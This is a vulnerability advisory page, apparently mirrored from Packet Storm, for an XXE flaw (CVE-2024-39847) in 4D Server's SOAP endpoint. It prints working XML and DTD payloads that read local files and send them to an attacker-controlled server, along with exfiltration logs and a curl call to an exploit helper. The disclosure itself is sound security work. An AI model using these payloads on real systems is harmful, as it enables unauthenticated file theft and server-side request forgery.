📄 4D Server Server-Side Request Forgery / Arbitrary File Read

8.7 / 10

HIGH

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:N/SI:N/VA:N/SA:N/AU:Y

Description

Unauthenticated attackers can exploit a weakness in the XML parser functionality of the SOAP endpoints in 4D server. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to...

Visit Original Source

Basic Information

ID PACKETSTORM:221283

Published May 18, 2026 at 00:00

Affected Product

Affected Versions -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Arbitrary File Read and Server Side Request Forgery via XML External
Entities in 4D Server
SOAP
===============================================================================================

Unauthenticated attackers can exploit a weakness in the XML parser
functionality of the
SOAP endpoints in 4D server. This allows them to obtain read access to
files on the
application server and adjacent network shares, and perform HTTP GET
requests to arbitrary
services.

Metadata
========

- - Affected product: 4D Server
- - Affected version: v20 R3
- - Vendor: 4D
- - Problem type(s): CWE-611 Improper Restriction of XML External Entity
Reference
- - CVE ID: CVE-2024-39847
- - CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-39847
- - CVSS 4.0 score: 8.7
- - Advisory URL: https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-002/

Details
=======

During a recent external penetration test, an application based on the
4D development
platform[0] was examined. 4D Server is a component of the 4D suite, and
acts as the
database and application server, serving mobile and desktop clients.
SCHUTZWERK identified
an arbitrary file read vulnerability via XML external entities in the
SOAP endpoint(s) of
4D Server.

Sending the following payload to the /4DSOAP endpoint showed that the
application
processes external XML entities, as requests were observed on the attack
server:

<!DOCTYPE foo [
<!ENTITY % test SYSTEM "http://attacker.tld">
%test;
]>

After setting up a local 4D Server instance, SCHUTZWERK was able to
confirm that the
vulnerability is present in the latest version of 4D Server (20 R3 at
the time of
writing). Additionally, SCHUTZWERK found that the vulnerability is
exploitable even if
"Reject SOAP-Requests" is set in the 4D Server GUI.

Further testing revealed that a combination of error-based and
out-of-band exfiltration
techniques can be utilized to read arbitrary files on the application
servers' file system
and adjacent network shares, as well as performing HTTP requests to
arbitrary URLs. This
requires the use of a Document Type Definition (DTD) file loaded from an
attacker
controlled server, and can be demonstrated using the following payloads:

Stage 1: XML body sent to the /4DSOAP endpoint

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % stage1 SYSTEM "http://192.168.56.1:2121/stage.dtd">
%stage1;
]>

Stage 2: DTD file returned by http://192.168.56.1:2121/stage.dtd

<!ENTITY % fileb SYSTEM "file:///c:\Users\john.doe\Desktop\secret.txt">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM '%fileb;'>">
%eval;
%exfiltrate;

Server response for the request sent to the /4DSOAP endpoint:

<?xml version="1.0" encoding="UTF-8" ?>
<SOAP-ENV:Envelope
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<SOAP-ENV:Fault>
<faultcode>SOAP-ENV:Client</faultcode>
<faultstring>error at line 6, column 1: invalid
document structure
</faultstring>
</SOAP-ENV:Fault>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Requests sent to the attacker controlled server (192.168.56.1:2121):

192.168.56.114 - - "GET /stage.dtd HTTP/1.1" 200 -
192.168.56.114 - - "GET
/my%20secret%20message%0D%0Ais%20super%20secret%0D%0Aand%20secure
HTTP/1.1" 200 -

Depending on the file contents, HTTP requests for the exfiltrate entity
may fail. On the
local test instance of 4D Server (which was set up by creating a new,
empty 4D application
project), this was the case when requesting files containing a hashtag
(#). In this case,
the file contents are instead returned as part of the /4DSOAP endpoint's
response message:

<?xml version="1.0" encoding="UTF-8" ?>
<SOAP-ENV:Envelope
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<SOAP-ENV:Fault>
<faultcode>SOAP-ENV:Client</faultcode>
<faultstring>error at line 5, column 13: unable to open
external entity 'http://192.168.56.1:2121/# my secret website
- - http:/secret.tld/bar'
</faultstring>
</SOAP-ENV:Fault>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

For some file contents, exfiltration using these methods will not
succeed. However,
depending on the application, exfiltration could still be achieved
utilizing application
specific SOAP functions accepting data tags.

The script 4d-xxe.py[1] was developed in order to aid in automated
exploitation. It
utilizes Flask[2] to start an exfiltration server on port 2121, and a
query endpoint on
port 1337. Once started, files can be requested by issuing a GET request to

http://127.0.0.1:1337/<target URI>

which will send the appropriate XML payload to obtain the specified
resource:

$ curl '127.0.0.1:1337/http://192.168.56.114'
<?xml version="1.0" encoding="UTF-8" ?>
<SOAP-ENV:Envelope
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<SOAP-ENV:Fault>
<faultcode>SOAP-ENV:Client</faultcode>
<faultstring>error at line 5, column 13: unable to
connect socket for URL 'http://192.168.56.1:2121/<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
[...]
<td class="grayborder">
<h2 align="center">Welcome to your 4D Web Server default home
page!</h2>
This is the 4D Web Server
default home page. This test page is served
by 4D
Application.
If you are the webmaster, congratulations!
Your Web
server is up and running. You are seeing this page because
you have
not yet replaced the default "index.html" file with
your actual
home page.
Instructions for configuring your 4D Web
Server can be found in the included documentation.
IMPORTANT: This Web page or Web site
is neither
owned nor administered by 4D SAS or any of its subsidiaries.
Please contact
the owner/webmaster of this site to report any problems with
it.
©1995-2024 4D, Inc., 4D SAS and its
Licensors. 
All rights reserved.
</td>
[...]
</html>
'
</faultstring>
</SOAP-ENV:Fault>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

This enables the use of any web directory enumeration tool to exfiltrate
files and/or
perform "proxied" HTTP requests.

Risk
====

An attacker can use the vulnerability to gather information and,
depending on the stored
data, exfiltrate secrets from the file system and adjacent SMB shares.
Furthermore, HTTP
requests can be used for out-of-band exfiltration and server-side
request forgery (SSRF)
attacks. Utilizing the SMB protocol could also lead to leakage of the
user's NTLM or SSP
hash.

Solution/Mitigation
===================

Update to 4D Server 20 R7 or higher.

Timeline
========

- - 2024-06-17 Vulnerability discovered
- - 2024-06-24 Attempt to contact vendor, no response received
- - 2024-06-25 CVE ID requested
- - 2024-06-29 CVE-2024-39847 assigned
- - 2024-07-04 Attempt to contact vendor again, no response received
- - 2024-07-09 Attempt to contact vendor again, no response received
- - 2024-07-16 Attempt to contact vendor again, no response received
- - 2024-07-22 Attempt to contact vendor again, no response received
- - 2026-04-29 Advisory published

Credits
=======

The vulnerability was discovered by Marcelo Reyes of SCHUTZWERK GmbH.

Footnotes
=========

[0] https://4d.com
[1] https://www.schutzwerk.com/blog/schutzwerk-sa-2024-002/4d-xxe.py
[2] https://flask.palletsprojects.com/en/stable/
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmnyGKIaHGFkdmlzb3Jp
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrs6TQ//Vp4Ts1sg8wUOx5V46ttU
OkErEUSrMqHDCrxiLKLsYoBBXyqPB+oKLzWFkMTUxbq+W7aqJIVG6EMeBsu1FCae
0JfGA0MYYJ4s7WcphN/QqqU+e35r0NfPAzcKlr861ZNcwcy9vbg/WP+z1AlTfH9X
MBKtv4Z2R1xpFq2sAJnwOw3E7Cl5g40PSsTJhI52/O7M4K5rB14EjFXW/hHgSFNz
ESUI+o/U1t7nPDulxfSsVmvbDTuvmxrs1xM/ulMYoKFKSueEglNCmF+5i/lFs7LF
rM0PZLGCbMR9z2NOeEk+dGwCztXpY2KN1KvPWYt4flvxZzlnWFWCzrVog8QdDhbV
CAfeLi+5krzgsZIPfphYpHc2BYJdAGsHDZx76GxoMNi8/miHX15+vg3N7SBPopOG
aIWnPJX0LCoecdzELJhzpOSYpzLTurRKnPU6y4sa/gJN4K99gCbE2HpPIJRaJmJG
hk7iwTUA11ijiEWpKCWX3hE3dhxY9WgKKoKe/CtGZkaEoEa1ePTPUFWhiwORpSsa
AV3i7YZOgjBiEj4ffBfy+Z/3fHhR7S3fWpFUhWeyb2jjx6OuJSG4g9az6Uze0hZG
vYn40CIpG2sHlm1PzQBzMUopqjmaW+FMyLgv8XOsnfdqg7UqPJ0LKmNAtafO1tVo
HH0qazSkyWNwZlaLr5YYUso=
=MhKk
-----END PGP SIGNATURE-----

--
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

[email protected] / www.schutzwerk.com

Geschäftsführer / Managing Directors:
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm / HRB 727391
Datenschutz / Data Protection www.schutzwerk.com/datenschutz

{
    "lastseen": "2026-05-18T20:00:05",
    "description": "Unauthenticated attackers can exploit a weakness in the XML parser functionality of the SOAP endpoints in 4D server. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to...",
    "published": "2026-05-18T00:00:00",
    "modified": "2026-05-18T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 4D Server Server-Side Request Forgery / Arbitrary File Read",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:221283",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2024-39847"
    ],
    "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\n    Hash: SHA512\n    \n    Arbitrary File Read and Server Side Request Forgery via XML External \n    Entities in 4D Server\n    SOAP\n    ===============================================================================================\n    \n    Unauthenticated attackers can exploit a weakness in the XML parser \n    functionality of the\n    SOAP endpoints in 4D server. This allows them to obtain read access to \n    files on the\n    application server and adjacent network shares, and perform HTTP GET \n    requests to arbitrary\n    services.\n    \n    Metadata\n    ========\n    \n    - - Affected product: 4D Server\n    - - Affected version: v20 R3\n    - - Vendor: 4D\n    - - Problem type(s): CWE-611 Improper Restriction of XML External Entity \n    Reference\n    - - CVE ID: CVE-2024-39847\n    - - CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-39847\n    - - CVSS 4.0 score: 8.7\n    - - Advisory URL: https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-002/\n    \n    Details\n    =======\n    \n    During a recent external penetration test, an application based on the \n    4D development\n    platform[0] was examined. 4D Server is a component of the 4D suite, and \n    acts as the\n    database and application server, serving mobile and desktop clients. \n    SCHUTZWERK identified\n    an arbitrary file read vulnerability via XML external entities in the \n    SOAP endpoint(s) of\n    4D Server.\n    \n    Sending the following payload to the /4DSOAP endpoint showed that the \n    application\n    processes external XML entities, as requests were observed on the attack \n    server:\n    \n    <!DOCTYPE foo [\n     <!ENTITY % test SYSTEM \"http://attacker.tld\">\n     %test;\n    ]>\n    \n    After setting up a local 4D Server instance, SCHUTZWERK was able to \n    confirm that the\n    vulnerability is present in the latest version of 4D Server (20 R3 at \n    the time of\n    writing). Additionally, SCHUTZWERK found that the vulnerability is \n    exploitable even if\n    \"Reject SOAP-Requests\" is set in the 4D Server GUI.\n    \n    Further testing revealed that a combination of error-based and \n    out-of-band exfiltration\n    techniques can be utilized to read arbitrary files on the application \n    servers' file system\n    and adjacent network shares, as well as performing HTTP requests to \n    arbitrary URLs. This\n    requires the use of a Document Type Definition (DTD) file loaded from an \n    attacker\n    controlled server, and can be demonstrated using the following payloads:\n    \n    Stage 1: XML body sent to the /4DSOAP endpoint\n    \n    <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n    <!DOCTYPE foo [\n      <!ENTITY % stage1 SYSTEM \"http://192.168.56.1:2121/stage.dtd\">\n      %stage1;\n    ]>\n    \n    Stage 2: DTD file returned by http://192.168.56.1:2121/stage.dtd\n    \n    <!ENTITY % fileb SYSTEM \"file:///c:\\Users\\john.doe\\Desktop\\secret.txt\">\n    <!ENTITY % eval \"<!ENTITY % exfiltrate SYSTEM '%fileb;'>\">\n    %eval;\n    %exfiltrate;\n    \n    Server response for the request sent to the /4DSOAP endpoint:\n    \n    <?xml version=\"1.0\" encoding=\"UTF-8\" ?>\n    <SOAP-ENV:Envelope \n    SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" \n    xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" \n    xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" \n    xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" \n    xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\n    <SOAP-ENV:Body>\n            <SOAP-ENV:Fault>\n                    <faultcode>SOAP-ENV:Client</faultcode>\n                    <faultstring>error at line 6, column 1: invalid \n    document structure\n    </faultstring>\n            </SOAP-ENV:Fault>\n    </SOAP-ENV:Body>\n    </SOAP-ENV:Envelope>\n    \n    Requests sent to the attacker controlled server (192.168.56.1:2121):\n    \n    192.168.56.114 - - \"GET /stage.dtd HTTP/1.1\" 200 -\n    192.168.56.114 - - \"GET \n    /my%20secret%20message%0D%0Ais%20super%20secret%0D%0Aand%20secure \n    HTTP/1.1\" 200 -\n    \n    Depending on the file contents, HTTP requests for the exfiltrate entity \n    may fail. On the\n    local test instance of 4D Server (which was set up by creating a new, \n    empty 4D application\n    project), this was the case when requesting files containing a hashtag \n    (#). In this case,\n    the file contents are instead returned as part of the /4DSOAP endpoint's \n    response message:\n    \n    <?xml version=\"1.0\" encoding=\"UTF-8\" ?>\n    <SOAP-ENV:Envelope \n    SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" \n    xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" \n    xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" \n    xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" \n    xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\n    <SOAP-ENV:Body>\n            <SOAP-ENV:Fault>\n                    <faultcode>SOAP-ENV:Client</faultcode>\n                    <faultstring>error at line 5, column 13: unable to open \n    external entity 'http://192.168.56.1:2121/# my secret website\n    - - http:/secret.tld/bar'\n    </faultstring>\n            </SOAP-ENV:Fault>\n    </SOAP-ENV:Body>\n    </SOAP-ENV:Envelope>\n    \n    For some file contents, exfiltration using these methods will not \n    succeed. However,\n    depending on the application, exfiltration could still be achieved \n    utilizing application\n    specific SOAP functions accepting data tags.\n    \n    The script 4d-xxe.py[1] was developed in order to aid in automated \n    exploitation. It\n    utilizes Flask[2] to start an exfiltration server on port 2121, and a \n    query endpoint on\n    port 1337. Once started, files can be requested by issuing a GET request to\n    \n    http://127.0.0.1:1337/<target URI>\n    \n    which will send the appropriate XML payload to obtain the specified \n    resource:\n    \n    $ curl '127.0.0.1:1337/http://192.168.56.114'\n    <?xml version=\"1.0\" encoding=\"UTF-8\" ?>\n    <SOAP-ENV:Envelope \n    SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" \n    xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" \n    xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" \n    xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" \n    xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\n    <SOAP-ENV:Body>\n            <SOAP-ENV:Fault>\n                    <faultcode>SOAP-ENV:Client</faultcode>\n                    <faultstring>error at line 5, column 13: unable to \n    connect socket for URL 'http://192.168.56.1:2121/<!DOCTYPE HTML PUBLIC \n    \"-//W3C//DTD HTML 4.01 Transitional//EN\" \n    \"http://www.w3.org/TR/html4/loose.dtd\">\n    \n    <html>\n    [...]\n          <td class=\"grayborder\">\n            <h2 align=\"center\">Welcome to your 4D Web Server default home\n              page!</h2>\n            <p align=\"center\">This is the <strong><b>4D Web Server</b></strong>\n              default home page. This <strong>test page</strong> is served \n    by 4D\n              Application.</p>\n            <p align=\"center\">If you are the webmaster, congratulations! \n    Your Web\n              server is up and running. You are seeing this page because \n    you have\n              not yet replaced the default \"index.html\" file with \n    your actual\n              home page.</p>\n            <p align=\"center\">Instructions for configuring your 4D Web\n              Server can be found in the included documentation.</p>\n            <p align=\"center\"><b>IMPORTANT</b>: This Web page or Web site \n    is neither\n              owned nor administered by 4D SAS or any of its subsidiaries. \n    Please contact\n              the owner/webmaster of this site to report any problems with \n    it.</p>\n            <p align=\"center\">©1995-2024 4D, Inc., 4D SAS and its \n    Licensors.<br>\n              All rights reserved.</p>\n           </td>\n    [...]\n    </html>\n    '\n    </faultstring>\n    </SOAP-ENV:Fault>\n    </SOAP-ENV:Body>\n    </SOAP-ENV:Envelope>\n    \n    This enables the use of any web directory enumeration tool to exfiltrate \n    files and/or\n    perform \"proxied\" HTTP requests.\n    \n    Risk\n    ====\n    \n    An attacker can use the vulnerability to gather information and, \n    depending on the stored\n    data, exfiltrate secrets from the file system and adjacent SMB shares. \n    Furthermore, HTTP\n    requests can be used for out-of-band exfiltration and server-side \n    request forgery (SSRF)\n    attacks. Utilizing the SMB protocol could also lead to leakage of the \n    user's NTLM or SSP\n    hash.\n    \n    Solution/Mitigation\n    ===================\n    \n    Update to 4D Server 20 R7 or higher.\n    \n    Timeline\n    ========\n    \n    - - 2024-06-17 Vulnerability discovered\n    - - 2024-06-24 Attempt to contact vendor, no response received\n    - - 2024-06-25 CVE ID requested\n    - - 2024-06-29 CVE-2024-39847 assigned\n    - - 2024-07-04 Attempt to contact vendor again, no response received\n    - - 2024-07-09 Attempt to contact vendor again, no response received\n    - - 2024-07-16 Attempt to contact vendor again, no response received\n    - - 2024-07-22 Attempt to contact vendor again, no response received\n    - - 2026-04-29 Advisory published\n    \n    Credits\n    =======\n    \n    The vulnerability was discovered by Marcelo Reyes of SCHUTZWERK GmbH.\n    \n    Footnotes\n    =========\n    \n    [0] https://4d.com\n    [1] https://www.schutzwerk.com/blog/schutzwerk-sa-2024-002/4d-xxe.py\n    [2] https://flask.palletsprojects.com/en/stable/\n    -----BEGIN PGP SIGNATURE-----\n    \n    iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmnyGKIaHGFkdmlzb3Jp\n    ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrs6TQ//Vp4Ts1sg8wUOx5V46ttU\n    OkErEUSrMqHDCrxiLKLsYoBBXyqPB+oKLzWFkMTUxbq+W7aqJIVG6EMeBsu1FCae\n    0JfGA0MYYJ4s7WcphN/QqqU+e35r0NfPAzcKlr861ZNcwcy9vbg/WP+z1AlTfH9X\n    MBKtv4Z2R1xpFq2sAJnwOw3E7Cl5g40PSsTJhI52/O7M4K5rB14EjFXW/hHgSFNz\n    ESUI+o/U1t7nPDulxfSsVmvbDTuvmxrs1xM/ulMYoKFKSueEglNCmF+5i/lFs7LF\n    rM0PZLGCbMR9z2NOeEk+dGwCztXpY2KN1KvPWYt4flvxZzlnWFWCzrVog8QdDhbV\n    CAfeLi+5krzgsZIPfphYpHc2BYJdAGsHDZx76GxoMNi8/miHX15+vg3N7SBPopOG\n    aIWnPJX0LCoecdzELJhzpOSYpzLTurRKnPU6y4sa/gJN4K99gCbE2HpPIJRaJmJG\n    hk7iwTUA11ijiEWpKCWX3hE3dhxY9WgKKoKe/CtGZkaEoEa1ePTPUFWhiwORpSsa\n    AV3i7YZOgjBiEj4ffBfy+Z/3fHhR7S3fWpFUhWeyb2jjx6OuJSG4g9az6Uze0hZG\n    vYn40CIpG2sHlm1PzQBzMUopqjmaW+FMyLgv8XOsnfdqg7UqPJ0LKmNAtafO1tVo\n    HH0qazSkyWNwZlaLr5YYUso=\n    =MhKk\n    -----END PGP SIGNATURE-----\n    \n    \n    -- \n    SCHUTZWERK GmbH, Pfarrer-Wei\u00df-Weg 12, 89077 Ulm, Germany\n    Zertifiziert / Certified ISO 27001, 9001 and TISAX\n    \n    Phone +49 731 977 191 0\n    \n    [email protected] / www.schutzwerk.com\n    \n    Gesch\u00e4ftsf\u00fchrer / Managing Directors:\n    Jakob Pietzka, Michael Sch\u00e4fer\n    \n    Amtsgericht Ulm /  HRB 727391\n    Datenschutz / Data Protection www.schutzwerk.com/datenschutz",
    "sourceHref": "https://packetstorm.news/download/221283",
    "cvss": {
        "score": 8.7,
        "severity": "HIGH",
        "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:N/SI:N/VA:N/SA:N/AU:Y",
        "version": "4.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/221283/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 4D Server Server-Side Request Forgery / Arbitrary File Read_PACKETSTORM:221283

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply